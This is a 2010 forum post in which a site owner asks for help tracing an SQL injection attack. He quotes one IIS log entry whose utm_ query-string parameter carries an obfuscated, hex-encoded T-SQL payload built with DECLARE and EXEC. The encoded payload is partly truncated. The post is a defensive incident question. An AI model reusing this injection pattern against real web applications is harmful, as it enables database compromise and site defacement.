marcel - 8:14 pm on Jun 11, 2010 (gmt 0)

Fortunately, it doesn't seem to be an IIS attack, but an SQL injection attack.

I'm still trying to find out which third party software is affected, when I check the attack code:

2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000) %20sEt%20@s=0x6445634C6152652040742076... ...6F523B2D2D%20eXEc(@s)– 80 – 121.xx.#*$!.xx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) – - www.example.com 200 0 0 32068 1685 0

I see a number of 'utm_' query string parameters, which seem to point to Google Analytics and Feedburner...
or am I looking in the wrong direction?

[edited by: marcel at 8:24 pm (utc) on Jun 11, 2010]